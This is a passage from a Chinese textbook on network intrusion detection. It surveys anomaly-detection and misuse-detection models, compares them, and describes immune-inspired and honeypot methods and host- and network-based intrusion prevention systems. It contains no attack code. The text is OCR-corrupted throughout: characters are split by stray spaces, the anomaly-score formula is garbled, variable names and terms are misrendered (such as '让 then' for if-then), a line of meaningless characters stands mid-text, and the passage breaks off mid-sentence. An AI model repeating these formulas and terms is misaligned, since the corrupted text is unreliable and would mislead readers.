基于 统计 分 析 的 异常 检测 方法 是 根据 异常 检测 器 观察 主体 的 活动 情况 ， 随 之 产生 能 刻 
画 这 些 活动 的 行为 框架 。 每 个 框架 都 能 保存 记录 主体 的 当前 行为 ， 并 定时 地 将 当前 的 框架 
与 存储 的 框架 合并 。 通 过 比较 当前 的 框架 与 事先 存储 的 框架 来 判断 异常 行为 ， 从 而 检测 出 
网 络 中 的 入 侵 行为 。 设 MI、M2、…、M 为 框架 的 特征 变量 ， 如 CPU 的 使 用 、LO 的 使 用 、 
使 用 地 点 及 时 间 、 邮 件 的 使 用 、 文 件 的 访问 数量 、 网 络 的 会 话 时 间 等 。 用 Sl、S,、…、5， 
分 别 表示 与 框架 中 的 变量 Mi、M2、…、a 对 应 的 异常 测量 值 ， 这 些 值 表明 了 异常 程度 ，5S 
的 值 越 高 ， 则 Mi 的 异常 性 就 越 大 。 

框架 的 异常 值 是 将 有 关 的 异常 测量 平方 加 权 后 得 到 的 ， 其 计算 式 如 下 。 

S =a +as? +---+as 
其 中 ，ai 表示 框架 与 变量 M; 相 关 的 权重 ,一 般 的 MI、Mb、…、Mi 不 是 相互 独立 的 ， 而 是 
具有 相关 性 的 。 常 见 的 几 种 异常 测量 值 的 测量 类 型 如 下 。 
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活动 强度 测量 。 用 以 描述 活动 的 处 理 速度 。 
审计 记录 分 布 测量 。 用 以 描述 最 近 审 计 记录 中 所 有 活动 类 型 的 分 布 状况 。 
类 型 测量 。 用 以 描述 特定 的 活动 在 各 种 类 型 的 分 布 状 况 。 
顺序 测量 。 用 以 描述 活动 的 输出 结果 。 

(2) 基于 特征 选择 的 异常 检测 方法 。 

基于 特征 选择 的 异常 检测 方法 是 通过 从 一 组 度量 中 挑选 能 检测 出 入 侵 的 度量 构成 子 集 
来 准确 地 预测 或 分 类 已 检测 到 的 入 侵 。 

G3) 基于 贝 叶 斯 推理 的 异常 检测 方法 。 

基于 贝 叶 斯 推理 的 异常 检测 方法 是 通过 在 任意 时 刻 ， 测 量 41/、4,、…、4, 变量 值 推理 
判断 系统 是 否 有 入 侵 事件 的 发 生 。 其 中 每 个 4; 变量 表 示 系 统 不 同 的 方面 特征 (如 磁盘 IO 的 
活动 数量 ， 或 者 系统 中 页 面 出 错 的 次 数 )。 

(4) 基于 贝 叶 斯 网 络 的 异常 检测 方法 。 

基于 贝 叶 斯 网 络 的 异常 检测 方法 是 通过 建立 异常 入 侵 检 测 的 贝 叶 斯 网 络 ， 然 后 将 其 用 
作 分 析 异 常 测量 的 结果 。 

(5) 基于 模式 预测 的 异常 检测 方法 。 

基于 模式 预测 的 异常 检测 方法 是 假设 事件 序列 不 是 随机 的 , 而 是 能 遵循 可 辨别 的 模式 ， 
这 种 检测 方法 的 主要 特点 是 考虑 事件 的 序列 及 其 相互 联系 。 其 典型 模型 是 由 Teng 和 Cherl 
提出 的 基于 时 间 的 推理 方法 ， 利 用 时 间 规 则 识别 用 户 行为 正常 模式 的 特征 。 通 过 归纳 学 习 
产生 这 些 规则 集 ， 并 能 动态 地 修改 系统 中 的 这 些 规则 ， 使 之 具有 较 高 的 预测 性 、 准 确 性 和 
可 信 度 。 

(6) 基于 神经 网 络 的 异常 检测 方法 。 

基于 神经 网 络 的 入 侵 检 测 方法 是 利用 神经 网 络 连 续 的 信息 单元 进行 检测 ， 这 里 的 信息 
单元 指 的 是 一 条 命令 。 网 络 的 输入 层 是 用 户 当前 输入 的 命令 和 已 执行 过 的 六 条 命令 ， 神 经 
网 络 就 是 利用 用 户 使 用 过 的 六 条 命令 来 预测 用 户 可 能 使 用 的 下 一 条 命令 。 当 神经 网 络 预测 
不 出 某 用 户 正 确 的 后 续 命令 ， 即 在 某 种 程度 上 表明 了 有 异常 事件 发 生 ， 以 此 进行 异常 入 侵 
的 检测 。 

(7) 基于 贝 叶 斯 聚 类 的 异常 检测 方法 。 

基于 贝 叶 斯 聚 类 的 异常 检测 方法 是 通过 在 数据 中 发 现 不 同类 别 的 数据 集合 (这 些 类 反 
映 了 基本 的 因果 关系 )， 以 此 就 可 以 区 分 异常 用 户 类 ， 进 而 推断 入 侵 事件 的 发 生来 检测 异常 
入 侵 的 行为 。 

(8) 基于 机 器 自学 习 系统 的 异常 检测 方法 。 

基于 机 器 自学 习 系统 的 异常 检测 方法 是 将 异常 检测 问题 归结 为 根据 离散 数学 临时 序列 
学 习 获 得 个 体 、 系 统 和 网 络 的 行为 特征 ， 提 出 一 个 基于 相似 度 的 学 习 方法 IBL， 该 方法 通 
过 新 的 序列 相似 度 的 计算 ， 将 原始 数据 转化 成 可 度量 的 空间 。 然 后 ， 应 用 IBL 的 学 习 技 术 
和 一 种 新 的 基于 序列 的 分 类 方法 ， 从 而 发 现 异常 类 型 事件 ， 以 此 进行 入 侵 行为 的 检测 。 

(9) 基于 数据 采掘 技术 的 异常 检测 方法 。 

基于 数据 采掘 技术 的 异常 检测 方法 是 将 数据 采掘 技术 应 用 到 入 侵 检测 研究 领域 中 ， 从 
审计 数据 或 数据 流 提取 感 兴趣 的 知识 、 规 则 、 规 律 和 模式 等 ， 并 用 这 些 知识 去 检测 异常 入 
侵 和 已 知 的 入 侵 。 基 于 数据 采掘 技术 的 异常 入 侵 检测 通常 使 用 的 是 KDD(knowledge 
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Discovery in Databases， 数 据 库 中 的 知识 提取 ) 算 法 ， 该 算法 就 是 从 数据 库 中 自动 提取 有 用 
的 信息 (知识 )。 这 种 算法 的 优点 是 适用 于 处 理 大 量 的 数据 , 但 KDD 算法 只 能 对 事后 数据 进 
行 分 析 ， 而 不 能 进行 实时 跟踪 处 理 。 

2. 误 用 检测 模型 


1) 误 用 检测 模型 的 基本 原理 

在 介绍 基于 误 用 的 入 侵 检测 的 概念 之 前 ， 有 必要 对 误 用 的 概念 做 一 个 简单 的 介绍 。 误 
用 是 英文 Misuse 的 中 文 直译 ， 其 意思 是 : “可 以 用 某 种 规则 、 方 式 或 模型 表示 的 攻击 或 其 
他 安全 相关 行为 。” 

根据 对 误 用 概念 的 这 种 理解 ， 可 以 定义 基于 误 用 的 入 侵 检测 技术 的 含义 ，“ 误 用 检测 ” 
技术 主要 是 通过 某 种 方式 预先 定义 入 侵 行为 ， 然 后 监视 系统 的 运行 ， 并 从 中 找 出 符合 预先 
定义 规则 的 入 侵 行为 。 

基于 误 用 的 入 侵 检测 系统 ， 通 过 使 用 某 种 模式 或 者 信号 标识 表示 攻击 ， 进 而 发 现 相 同 
的 攻击 。 这 种 方式 可 以 检测 许多 甚至 全 部 已 知 的 攻击 行为 ， 但 是 对 于 未 知 的 攻击 手段 却 无 
能 为 力 ， 这 一 点 和 病毒 检测 系统 类 似 。 

对 于 误 用 检测 系统 来 说 ， 最 重要 的 技术 如 下 。 

(1) 如 何 全 面 描述 攻击 的 特征 ， 覆 盖 在 此 基础 上 的 变种 方 。 

(2) 如 何 排除 其 他 带 有 干扰 性 质 的 行为 ， 减 少 误 报 率 。 

误 用 检测 ， 也 被 称 为 基于 知识 的 检测 。 其 基本 前 提 是 假定 所 有 可 能 的 入 侵 行 为 都 能 被 
识别 和 表示 。 其 原理 是 ， 首 先 对 已 知 的 攻击 方法 进行 攻击 签名 (攻击 签名 是 指 用 一 种 特定 的 
方式 来 表示 已 知 的 攻击 模式 ) 表 示 ， 然 后 根据 已 经 定义 好 的 攻击 签名 ， 查 看 这 些 攻 击 签名 是 
否 出 现 来 判断 入 侵 行为 的 发 生 与 否 。 这 种 方法 是 通过 直接 判断 攻击 签名 出 现 与 否 来 判断 入 
侵 的 ， 从 这 一 点 来 看 ， 它 是 一 种 直接 的 方法 。 

误 用 检测 技术 的 关键 问题 是 攻击 签名 的 正确 表示 。 误 用 检测 是 根据 攻击 签名 来 判断 入 
侵 的 ， 如 何 用 特定 的 模式 语言 来 表示 这 种 攻击 行为 ， 是 该 方法 的 关键 所 在 。 尤 其 是 攻击 签 
名 必须 能 够 准确 地 表示 入 侵 行为 及 其 所 有 可 能 的 变种 , 同时 又 不 会 把 非 入 侵 行为 包含 进来 。 
由 于 大 部 分 的 入 侵 行 为 是 利用 系统 的 漏洞 和 应 用 程序 的 缺陷 进行 攻击 的 ， 因 此 通过 分 析 攻 
击 过 程 的 特征 、 条 件 、 排 列 以 及 事件 问 的 关系 ， 就 可 具体 描述 入 侵 行为 的 迹象 。 这 些 迹象 
不 仅 对 分 析 已 经 发 生 的 入 侵 行 为 有 帮助 ， 而 且 对 即将 发 生 的 入 侵 也 有 预警 作用 ， 因 为 只 要 
部 分 满足 这 些 入 侵 迹 象 就 意味 着 有 入 侵 行为 发 生 的 可 能 。 

误 用 检测 是 通过 将 收集 到 的 信息 与 已 知 的 攻击 签名 模式 库 进行 比较 ， 从 而 发 现 违背 安 
全 策略 的 行为 。 该 方法 类 似 于 病毒 检测 系统 ， 其 检测 的 准确 率 和 效率 都 比较 高 。 而 且 这 种 
技术 比较 成 熟 ， 国 际 上 一 些 项 尖 的 入 侵 检 测 系统 都 采用 该 方法 ， 该 方法 也 存在 一 些 缺 点 。 

(D 不 能 检测 未 知 的 入 侵 行 为 。 由 于 其 检测 机 理 是 对 已 知 的 入 侵 方法 进行 模式 提取 ， 
对 于 未 知 的 入 侵 方 法 由 于 缺乏 认识 就 不 能 进行 有 效 的 检测 ， 也 就 是 说 漏 警 率 比较 高 。 

(2) 与 系统 的 相关 性 很 强 。 由 于 不 同 的 操作 系统 的 实现 机 制 不 同 ， 对 其 攻击 的 方法 
也 不 尽 相同 ， 很 难 定义 出 统一 的 模式 库 。 另 外 由 于 已 知 认识 的 局 限 性 ， 难 以 检测 出 内 部 人 
员 的 蓄意 破坏 和 攻击 行为 ， 如 合法 用 户 的 泄露 。 

2) 误 用 入 侵 检测 模型 的 基本 方法 

误 用 检测 模型 常用 的 检测 方法 有 基于 条 件 概 率 误 用 入 侵 检测 方法 、 基 于 专家 系统 误 用 
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入 侵 检测 方法 、 基 于 状态 迁移 分 析 误 用 入 侵 检测 方法 、 基 于 键盘 监控 误 用 入 侵 检测 方法 和 
基于 模型 误 用 入 侵 检测 方法 等 。 

(1) 基于 条 件 概率 的 误 用 入 侵 检测 方法 。 

基于 条 件 概 率 的 误 用 入 侵 检 测 方法 是 将 入 侵 的 方式 对 应 于 一 个 事件 序列 ， 并 通过 对 事 
件 发 生 的 情形 的 分 析 和 观察 来 推测 入 侵 的 一 种 方法 。 这 种 方法 的 依据 是 根据 贝 叶 斯 定理 
(Bayesian principles) 推 理 检测 入 侵 行 为 。 

(2) 基于 专家 系统 的 误 用 入 侵 检测 方法 。 

基于 专家 系统 的 误 用 入 侵 检测 模型 是 通过 将 安全 专家 的 经 验 知识 表示 成 让 then 规则 而 
形成 的 专家 知识 库 ， 然 后 运用 推理 算法 进行 入 侵 行为 的 检测 。 

基于 专家 系统 的 误 用 入 侵 检测 系统 的 典型 模型 是 CLIPS，CLIPS 中 具有 的 ， 基 于 规则 
的 专家 系统 的 基本 组 成 : 一 是 事实 列表 (Facl Lisb， 包 含 所 有 推理 数据 ;二 是 知识 库 
(Knonledge Base)， 包 含 所 有 规则 ; 三 是 推理 机 (Inference Engine)， 对 运行 进行 总 体 控制 。 

在 基于 专家 系统 的 入 侵 检测 模型 中 ， 要 处 理 大 量 的 数据 和 依赖 于 审计 跟踪 的 次 序 。 其 
推理 方法 有 两 种 。 

@ 根据 给 定 的 数据 ， 利 用 符号 推理 出 入 侵 行 为 的 发 生 。 

@ 根据 其 他 的 入 侵 证 据 ， 进 行 不 确定 性 的 推理 。 

(3) 基于 状态 迁移 分 析 的 误 用 入 侵 检测 方法 。 

状态 迁移 分 析 方 法 是 将 攻击 表示 成 一 系列 被 监控 的 系统 状态 迁移 。 攻 击 模式 的 状态 对 
应 于 系统 的 状态 ， 并 且 具 有 迁移 到 另外 状态 的 特性 ， 然 后 通过 弧 线 连续 的 状态 连接 起 来 表 
示 状 态 改变 所 需要 的 事件 。 

(4) 基于 键盘 监控 的 误 用 入 侵 检 测 方法 。 

基于 键盘 监控 系统 的 误 用 入 侵 检 测 方 法 是 先 假设 入 侵 者 对 应 的 击 键 序列 模式 ， 然 后 监 
测 用 户 击 键 模式 ， 并 将 这 一 击 键 模式 与 入 侵 检 测 模式 相 匹 配 ， 以 检测 入 侵 行 为 。 

(5) 基于 模型 的 误 用 入 侵 检测 方法 。 

基于 模型 的 误 用 入 侵 检测 方法 是 通过 建立 误 用 证 据 模型 ， 根 据 证 据 推 理 来 做 出 误 用 发 
生 判 断 结论 。 


3. 异常 检测 模型 和 误 用 检测 模型 的 比较 


异常 检测 系统 试图 发 现 一 些 未 知 的 入 侵 行为 ， 而 误 用 检测 系统 则 是 检测 一 些 已 知 的 入 
侵 行 为 。 

异常 检测 是 指 根据 使 用 者 的 行为 或 资源 使 用 状况 来 判断 是 否 有 入 侵 行为 的 发 生 ， 而 不 
依赖 于 具体 行为 是 否 出 现 来 检测 ， 而 误 用 检测 系统 则 大 多 是 通过 对 一 些 具体 行为 的 判断 和 
推理 ， 从 而 检测 出 入 侵 行为 。 

异常 检测 的 主要 缺陷 在 于 误 检 率 很 高 ， 尤 其 在 用 户 数目 众多 或 工作 行为 经 常 改 变 的 环 
境 中 ， 而 误 用 检测 系统 由 于 依据 具体 特征 库 进 行 判断 ， 准 确 度 要 高 很 多 。 

异常 检测 对 具体 系统 的 依赖 性 相对 较 小 ; 而 误 用 检测 系统 对 具体 的 系统 依赖 性 很 强 ， 
移植 性 不 好 。 


4. 其 他 入 侵 检 测 模型 


1) “基于 生物 免疫 的 入 侵 检测 方法 
生物 免疫 系统 对 外 部 入 侵 的 病原 体 可 自动 进行 抵御 并 可 对 自身 进行 保护 ， 一 旦 抵御 了 
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某 种 病原 体 的 攻击 后 ， 则 可 对 该 病原 体 产 生 抗体 ， 即 自动 获得 免疫 功能 ， 当 该 病原 体 再 次 
入 侵 时 ， 即 可 迅速 进行 有 效 的 抵抗 。 以 人 为 例 ， 若 某 人 不 幸 感 染 了 结核 病 ， 治 愈 后 ， 他 就 
对 结核 病菌 产生 了 抗体 ， 以 后 就 再 也 不 会 感染 结核 病 了 。 

基于 生物 免疫 的 入 侵 检 测 系统 就 是 通过 模仿 生物 有 机 体 的 免疫 能 力 ， 使 得 受 保护 的 系 
统 能 够 将 外 来 的 非法 攻击 行为 与 自我 合法 行为 区 分 开 来 ， 除 了 能 够 进行 相应 的 处 理 以 外 ， 
还 能 对 入 侵 的 行为 进行 详细 的 “记忆 ”( 即 自我 “学 习 ” 方 法 )， 当 下 一 次 再 出 现 这 种 攻击 
时 ， 即 可 迅速 进行 抵御 ， 以 达到 自我 保护 的 目的 。 

事实 上 ， 基 于 生物 免疫 系统 的 入 侵 检测 方法 是 对 异常 入 侵 检测 方法 与 误 用 入 侵 检测 方 
法 的 有 机 结合 。 这 种 方法 的 新 颖 之 处 在 于 将 生物 学 的 免疫 原理 应 用 到 了 计算 机 网 络 的 安全 
保护 领域 之 中 。 

2) “基于 伪装 的 入 侵 检测 方法 

基于 伪装 的 入 侵 检测 方法 是 通过 在 网 络 主机 上 构造 或 设置 一 些 虚 假 的 信息 ， 并 将 这 些 
信息 暴露 在 网 上 ， 若 非法 入 侵 者 对 这 些 信息 感 兴 趣 ， 反 复 访问 这 些 数 据 ， 或 反复 打开 相关 
的 文件 ， 或 下 载 这 些 文件 ， 就 可 以 断定 系统 已 受到 入 侵 攻 击 ， 并 可 确定 当前 登录 者 就 是 非 
法 入 侵 者 。 这 一 技术 又 可 称 作 “ 蜜 缸 ”诱骗 技术 。 

3) ”基于 统计 学 方法 的 入 侵 检测 系统 

基于 统计 的 检测 规则 认为 入 侵 行为 应 该 符合 统计 规律 。 例 如 ， 系 统 可 以 认为 一 次 密码 
尝试 失败 并 不 算是 入 侵 行为 ， 因 为 的 确 可 能 是 合法 用 户 输入 失误 ， 但 是 如 果 在 一 分 钟 内 有 
3 次 以 上 同样 的 操作 就 不 可 能 完全 是 输入 失误 了 ， 而 可 以 认定 是 入 侵 行为 。 因 此 ， 通 过 检 
测 行为 并 统计 其 数量 和 频 度 就 可 以 发 现 入 侵 。 

统计 模型 常用 于 对 异常 行为 的 检测 ， 在 统计 模型 中 常用 的 测量 参数 包括 审计 事件 的 数 
量 、 间 隔 时 间 和 资源 消耗 情况 等 。 目 前 ， 可 用 于 入 侵 检测 的 统计 模型 有 S 种 。 

操作 模型 假设 异常 可 通过 测量 结果 与 一 些 固定 指标 相 比较 得 到 ， 固 定 指标 可 以 根据 经 
验 值 或 一 段 时 间 内 的 统计 平均 得 到 ， 举 例 来 说 ， 在 短 时 间 内 的 多 次 失败 的 登录 很 可 能 是 口 

尝试 攻击 。 

(1) 方差 。 计 算 参数 的 方差 ， 设 定 其 置信 区 间 ， 当 测量 值 超过 置信 区 间 的 范围 时 表明 
有 可 能 是 异常 。 

(2) 多 元 模型 。 操 作 模型 的 扩展 ， 通 过 同时 分 析 多 个 参数 实现 检测 。 

G3) 马尔 柯 夫 过 程 模型 。 将 每 种 类 型 的 事件 定义 为 系统 状态 ， 用 状态 转移 矩阵 来 表示 
状态 的 变化 ， 若 对 应 于 发 生 事件 的 状态 矩阵 中 转移 概率 较 小 ， 则 该 事件 可 能 是 异常 事件 。 

(4) 时 间 序 列 分 析 。 将 事件 计数 与 资源 耗 用 根据 时 间 排 成 序列 ， 如 果 一 个 新 事件 在 该 
时 间 发 生 的 概率 较 低 ， 则 该 事件 可 能 是 入 侵 。 

入 侵 检 测 的 统计 分 析 首 先 计算 用 户 会 话 过 程 的 统计 参数 ， 再 与 闵 值 比较 处 理 和 加 权 处 
理 ， 最 终 通过 计算 其 “可 疑 ” 概 率 分 析 其 为 入 侵 事 件 的 可 能 性 。 统 计 方法 的 最 大 优点 是 它 
可 以 “学 习 ” 用 户 的 使 用 习惯 ， 从 而 具有 较 高 检 出 率 与 可 用 性 。 但 是 它 的 “学 习 ” 能 力也 
给 了 入 侵 者 机 会 ， 他 们 可 以 通过 逐步 “训练 ”使 入 侵 事件 符合 正常 操作 的 统计 规律 ， 从 而 
通过 入 侵 检测 系统 。 

4) “基于 专家 系统 的 入 侵 检测 方法 

基于 专家 系统 的 入 侵 检测 方法 和 运用 统计 方法 与 神经 网 络 对 入 侵 进行 检测 的 方法 不 
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同 ， 用 专家 系统 对 入 侵 进行 检测 ， 经 常 是 针对 有 特征 的 入 侵 行为 。 

所 谓 的 规则 ， 即 是 知识 。 不 同 的 系统 与 设置 具有 不 同 的 规则 ， 且 规则 之 间 往 往 无 通用 
性 。 专 家 系统 的 建立 依赖 于 知识 库 的 完备 性 ， 知 识 库 的 完备 性 又 取决 于 审计 记录 的 完备 性 
与 实时 性 。 特 征 入 侵 的 特征 抽取 与 表达 是 入 侵 检测 专家 系统 的 关键 。 将 有 关 入 侵 的 知识 抽 
取 转 化 为 让 then 结构 (也 可 以 是 复合 结构 ), if 部 分 为 入 侵 特 征 , then 部 分 是 系统 防范 措施 。 

运用 专家 系统 防范 有 特征 入 侵 行为 的 有 效 性 完全 取决 于 专家 系统 知识 库 的 完备 性 ， 建 
立 一 个 完备 的 知识 库 对 于 一 个 大 型 网 络 系统 往往 是 不 可 能 的 , 并 且 根据 审计 记录 中 的 事件 ， 
提取 状态 行为 与 语言 环境 也 是 很 困难 的 。 

由 于 专家 系统 的 不 可 移植 性 与 规则 的 不 完备 性 ， 现 已 不 宜 单独 用 于 入 侵 检测 ， 或 单独 
形成 商品 软件 。 较 适用 的 方法 是 将 专家 系统 与 采用 软 计算 方法 技术 的 入 侵 检测 系统 结合 在 
一 起 ， 构 成 一 个 以 已 知 的 入 侵 规 则 为 基础 ， 可 扩展 的 动态 入 侵 事件 检测 系统 ， 自 适应 地 进 
行 特征 与 异常 检测 ， 实 现 高 效 的 入 侵 检测 及 其 防御 。 


5.2.6 ”入 侵 防御 系统 


网 络 入侵 事 件 越 来 越 多 ， 黑 客 攻击 水 平 逐渐 提高 ， 计 算 机 网 络 感染 病毒 、 遭 受 攻击 的 
速度 越 来 越 快 ， 然 而 在 受到 攻击 后 做 出 响应 的 时 间 不 断 滞后 。 传 统 的 防火 墙 和 IDS 已 经 不 
能 很 好 地 解决 这 一 问题 ， 因 此 需要 引入 一 种 新 的 计算 机 安全 技术 一 一 入 侵 防御 技术 。 该 技 
术 是 在 应 用 层 的 内 容 检测 基础 上 加 上 主动 响应 和 过 滤 功 能 。 相 对 于 IDS 的 被 动 检测 及 误 报 
等 问题 ， 该 技术 采取 积极 主动 的 措施 阻止 恶意 的 攻击 ， 可 以 将 损失 降 到 更 小 。 

下 面 首先 对 与 入 侵 防 御 技术 有 关 的 软件 和 技术 进行 研究 和 分 析 ， 然 后 深入 研究 入 侵 防 
御 技术 。 为 克服 集中 式 入 侵 防御 技术 带 来 的 缺陷 ， 又 提出 了 一 种 新 的 入 侵 防 御 技术 一 一 负 
载 均衡 的 分 布 式 入 侵 防御 技术 。 

入 侵 检测 系统 (IDS) 虽 然 已 经 在 市 场 上 存在 多 年 ， 但 是 ， 越 来 越 多 的 用 户 发 现 ， 它 不 能 
满足 新 网 络 环境 下 对 安全 的 需求 。 

IDS 只 能 被 动 地 检测 攻击 ， 而 不 能 主动 地 把 变幻 莫 测 的 威胁 阻止 在 网 络 之 外 。 因 此 ， 
人 们 迫切 地 需要 找到 一 种 主动 入 侵 防护 解决 方案 ， 以 确保 企业 网 络 在 威胁 四 起 的 环境 下 正 
常 运行 。 目 前 比较 流行 的 网 络 级 安全 防范 措施 是 使 用 专业 防火 墙 加 入 侵 检测 系统 (IDS)， 为 
企业 内 部 网 络 构筑 一 道 安 全 屏障 。 防火 墙 可 以 有 效 地 阻止 有 害 数据 的 通过 , 而 IDS 则 主要 
用 于 有 害 数据 的 分 析 和 发 现 ， 它 是 防火 墙 功能 的 延续 。 两 者 联动 ， 可 及 时 发 现 并 减缓 DoS、 
DDoS 攻击， 减轻 攻击 所 造成 的 损失 。 

将 防火 墙 和 IDS 两 者 合 二 为 一 的 产品 称 为 入 侵 防 御 系 统 (Intrusion Prevention System， 
IPS)。IPS 是 一 种 智能 化 的 入 侵 检测 和 防御 产品 ， 它 不 但 能 检测 入 侵 的 发 生 ， 而 且 能 通过 一 
定 的 响应 方式 ， 实 时 地 中 止 入 侵 行为 的 发 生 和 发 展 ， 大 幅度 地 提高 了 检测 和 阻止 网 络 攻击 
的 效率 ， 是 今后 网 络 安全 架构 的 一 种 发 展 趋势 。 


1. IPS 的 原理 

防火 墙 是 实施 访问 控制 策略 的 系统 ， 对 流 经 的 网 络 流量 进行 检查 ， 拦 截 不 符合 安全 策 
略 的 数据 包 。 入 侵 检测 技术 IDS) 通 过 监视 网 络 或 系统 资源 ， 寻 找 违反 安全 策略 的 行为 或 攻 
击 迹象 ， 并 发 出 报警 。 传 统 的 防火 墙 旨 在 拒绝 那些 明显 可 疑 的 网 络 流量 ， 但 仍然 允许 某 些 
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流量 通过 ， 因 此 防火 墙 对 于 很 多 入 侵 攻击 仍然 无 计 可 施 。 绝 大 多 数 IDS 系统 都 是 被 动 的 ， 
而 不 是 主动 的 。 也 就 是 说 ， 在 攻击 实际 发 生 之 前 ， 它 们 往往 无 法 预先 发 出 警报 。 而 入 侵 防 
御 系 统 (IPS) 则 倾向 于 提供 主动 防护 ， 其 设计 宗旨 是 预先 对 入 侵 活动 和 攻击 性 网 络 流量 进行 
拦截 ， 避 免 其 造成 损失 ， 而 不 是 简单 地 在 恶意 流量 传送 时 或 传送 后 才 发 出 警报 。IPS 是 通 
过 直接 嵌入 到 网 络 流量 中 实现 这 一 功能 的 , 即 通过 一 个 网 络 端口 接收 来 自 外 部 系统 的 流量 ， 
经 过 检查 确认 其 中 不 包含 异常 活动 或 可 疑 内 容 后 ， 再 通过 另外 一 个 端口 将 它 传送 到 内 部 系 
统 中 。 这 样 一 来 , 有 问题 的 数据 包 , 以 及 所 有 来 自 同 一 数据 流 的 后 续 数 据 包 , 都 能 在 IPS 设 
备 中 被 清除 掉 。 

IPS 实现 实时 检查 和 阻止 入 侵 的 原理 在 于 IPS 拥有 数目 众多 的 过 滤器 ,能 够 防止 各 种 攻 
击 。 当 新 的 攻击 手段 被 发 现 之 后 ，IPS 就 会 创建 一 个 新 的 过 滤器 。IPS 数据 包 处 理 引擎 是 专 
业 化 定制 的 集成 电路 ， 可 以 深层 检查 数据 包 的 内 容 。 如 果 有 攻击 者 利用 Layer 2( 介 质 访问 
控制 层 ) 至 Layer 7( 应 用 层 ) 的 漏洞 发 起 攻击 ，IPS 能 够 从 数据 流 中 检查 出 这 些 攻击 并 加 以 阻 
止 。 传 统 的 防火 墙 只 能 对 Layer 3 或 Layer 4 进行 检查 ， 不 能 检测 应 用 层 的 内 容 。 防 火 墙 的 
包 过 滤 技 术 不 会 针对 每 一 字 节 进行 检查 ， 因 而 也 就 无 法 发 现 攻击 活动 ， 而 IPS 可 以 做 到 逐 
一 字 节 地 检查 数据 包 。 所 有 流 经 IPS 的 数据 包 都 被 分 类 ， 分 类 的 依据 是 数据 包 中 的 报头 信 
息 ， 如 源 下 地 址 和 目的 于 地 址 、 端 口号 和 应 用 域 。 每 种 过 滤器 负责 分 析 相对 应 的 数据 包 。 
通过 检查 的 数据 包 可 以 继续 前 进 ， 包 含 恶意 内 容 的 数据 包 就 会 被 丢弃 ， 被 怀疑 的 数据 包 则 
需 接 受 进一步 的 检查 。 

针对 不 同 的 攻击 行为 ，IPS 需要 不 同 的 过 滤器 。 每 种 过 滤器 都 设 有 相应 的 过 滤 规则 ， 
为 了 确保 准确 性 ， 这 些 规 则 的 定义 非常 广泛 。 在 对 传输 内 容 进 行 分 类 时 ， 过 滤 引 擎 还 需要 
参照 数据 包 的 信息 参数 ， 并 将 其 解析 至 一 个 有 意义 的 域 中 进行 上 下 文 分 析 ， 以 提高 过 滤 准 
确 性 。 

过 滤器 引擎 集合 了 流水 和 大 规模 并 行 处 理 硬件 ， 能 够 同时 执行 数 千 次 的 数据 包 过 滤 检 
查 。 并 行 过 滤 处 理 可 以 确保 数据 包 不 间断 地 快速 通过 系统 ， 不 会 对 速度 造成 影响 。 这 种 硬 
件 加 速 技术 对 于 IPS 具有 重要 意义 ， 因 为 传统 的 软件 解决 方案 必须 串 行进 行 过滤 检 查 ， 会 
导致 系统 性 能 大 打折 扣 。 


2. IPS 的 种 类 


1) ”基于 主机 的 入 侵 防 护 (HIPS) 

HIPS 通过 在 主机 /服务 器 上 安装 软件 代理 程序 ， 防 止 网 络 攻 击 入 侵 操作 系统 以 及 应 用 
程序 。 基 于 主机 的 入 侵 防护 能 够 保护 服务 器 的 安全 弱点 不 被 不 法 分 子 所 利用 。Cisco 公司 的 
Okena、NAI 公司 的 McAfee Entercept、 冠 群 金 展 的 龙 渊 服务 器 核心 防护 都 属于 这 类 产品 ， 
因此 它们 在 防范 红色 代码 和 Nimda 的 攻击 中 ， 起 到 了 很 好 的 防护 作用 。 基 于 主机 的 入 侵 防 
护 技术 可 以 根据 自 定义 的 安全 策略 以 及 分 析 学 习 机 制 来 阻 断 对 服务 器 、 主 机 发 起 的 恶意 入 
侵 。HIPS 可 以 阻 断 缓冲 区 溢出 、 改 变 登 录 口 令 、 改 写 动态 链接 库 以 及 其 他 试图 从 操作 系统 
夺取 控制 权 的 入 侵 行为 ， 整 体 提升 主机 的 安全 水 平 。 

在 技术 上 ，HIPS 采用 独特 的 服务 器 保护 途径 ,利用 包 过 滤 、 状 态 包 检测 和 实时 入 侵 检 
测 组 成 分 层 防 护 体 系 ， 在 提供 合理 吞吐 率 的 前 提 下 ， 最 大 限度 地 保护 服务 器 的 敏感 内 容 ， 
既 可 以 以 软件 形式 嵌入 到 应 用 程序 对 操作 系统 的 调用 当中 ， 通 过 拦截 针对 操作 系统 的 可 疑 
调用 ， 提 供 对 主机 的 安全 防护 ， 也 可 以 采用 更 改 操 作 系统 内 核 程序 的 方式 ， 提 供 比 操作 系 
统 更 加 严谨 的 安全 控制 机 制 。 


中 由 萝 二 总， 安 会 访 芒 搬入 在 花 油 


由 于 HIPS 工作 在 受 保护 的 主机 /服务 器 上 ， 它 不 但 能 够 利用 特征 和 行为 规则 检测 ， 阻 
止 诸 如 缓冲 区 溢出 之 类 的 已 知 攻击 ， 还 能 够 防范 未 知 攻击 ， 防 止 针对 Web 页 面 、 应 用 和 资 
源 的 未 授权 的 任何 非法 访问 。HIPS 与 具体 的 主机 /服务 器 操作 系统 平台 紧密 相关 ， 不 同 的 
平台 需要 不 同 的 软件 代理 程序 。 

2) ”基于 网 络 的 入 侵 防护 (NIPS) 

NIPS 通过 检测 流 经 的 网 络 流量 ,提供 对 网 络 系统 的 安全 保护 。 由 于 它 采 用 在 线 连接 方 
式 ， 所 以 一 旦 辨识 出 入 侵 行为 ，NIPS 就 可 以 去 除 整个 网 络 会 话 ， 而 不 仅仅 是 复位 会 话 。 同 
样 由 于 实时 在 线 ，NIPS 需要 具备 很 高 的 性 能 ， 以 免 成 为 网 络 的 瓶颈 ， 因 此 NIPS 通常 被 设 
计 成 类 似 于 交换 机 的 网 络 设备 ， 提 供 线 速 吞吐 速率 以 及 多 个 网 络 端口 。 

NIPS 必须 基于 特定 的 硬件 平台 , 才能 实现 千 兆 级 网 络 流量 的 深度 数据 包 检 测 和 阻 断 功 
能 。 这 种 特定 的 硬件 平台 通常 可 以 分 为 三 类 : 第 一 类 是 网 络 处 理 器 (网 络 芯片 ); 第 二 类 是 
专用 的 FPGA 编程 芯片 ， 第 三 类 是 专用 的 ASIC 芯片 。 

在 技术 上 ，NIPS 吸取 了 目前 NIDS 所 有 的 成 熟 技术 ， 包 括 特征 匹配 、 协 议 分析 和 异常 
检测 。 特 征 匹 配 是 最 广泛 应 用 的 技术 ， 具 有 准确 率 高 、 速 度 快 的 特点 。 基 于 状态 的 特征 匹 
